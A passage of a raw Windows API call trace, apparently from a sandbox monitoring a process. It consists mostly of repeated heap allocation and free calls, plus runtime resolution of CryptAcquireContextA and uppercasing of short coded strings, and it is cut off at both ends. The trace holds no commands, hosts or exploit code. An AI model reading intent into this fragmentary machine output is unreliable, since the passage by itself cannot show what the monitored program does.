out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.747] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.748] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.748] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0200.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.751] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.751] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.752] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0200.752] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.752] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0200.752] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.752] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.753] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.753] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.753] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.753] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.753] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.754] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.754] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0200.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.755] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.755] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.756] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.756] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.756] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.756] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.756] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.756] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.757] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.757] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.757] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.757] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.757] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.757] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.757] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.758] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.758] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.758] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.758] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, 